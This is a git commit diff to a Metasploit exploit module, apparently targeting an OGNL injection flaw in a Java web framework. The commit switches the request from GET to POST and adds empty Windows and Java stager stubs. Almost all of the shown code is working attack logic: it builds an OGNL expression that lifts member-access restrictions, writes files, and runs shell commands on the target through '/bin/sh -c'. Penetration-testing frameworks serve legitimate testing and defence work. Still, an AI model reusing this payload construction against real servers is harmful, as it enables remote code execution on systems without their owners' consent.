send http request (get -> post)

bug/bundler_fix
join-us 2016-04-30 00:08:00 +08:00
parent 643591546e
commit 9e56bb8358
1 changed files with 19 additions and 17 deletions

View File

@ -50,27 +50,23 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class)
end
def send_http_request(payload)
def send_http_request(payload, params)
uri = normalize_uri(datastore['TARGETURI'])
send_request_cgi(
'uri' => uri + payload,
'version' => '1.1',
'method' => 'GET')
'method' => 'POST',
'vars_post' => params
)
end
def parameterize(params) # params is a hash
URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
end
def generate_rce_payload(code, params_hash)
def generate_rce_payload(code)
payload = "?method:"
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
payload << ","
payload << Rex::Text.uri_encode(code)
payload << ","
payload << Rex::Text.uri_encode("1?#xx:#request.toString")
payload << "&"
payload << parameterize(params_hash)
payload
end
@ -94,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote
code << "##{var_b}.close()"
params_hash = { var_c => filename, var_d => content }
payload = generate_rce_payload(code, params_hash)
payload = generate_rce_payload(code)
send_http_request(payload)
send_http_request(payload, params_hash)
end
def execute_command(cmd)
@ -119,9 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
params_hash = { var_f => cmd }
payload = generate_rce_payload(code, params_hash)
payload = generate_rce_payload(code)
send_http_request(payload)
send_http_request(payload, params_hash)
end
def linux_stager
@ -140,6 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
execute_command("/bin/sh -c #{payload_exe}")
end
def windows_stager
end
def java_stager
end
def exploit
case target['Platform']
when 'linux'
@ -169,9 +171,9 @@ class MetasploitModule < Msf::Exploit::Remote
code << "##{var_a}.close()"
params_hash = { var_b => flag }
payload = generate_rce_payload(code, params_hash)
payload = generate_rce_payload(code)
resp = send_http_request(payload)
resp = send_http_request(payload, params_hash)
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
Exploit::CheckCode::Appears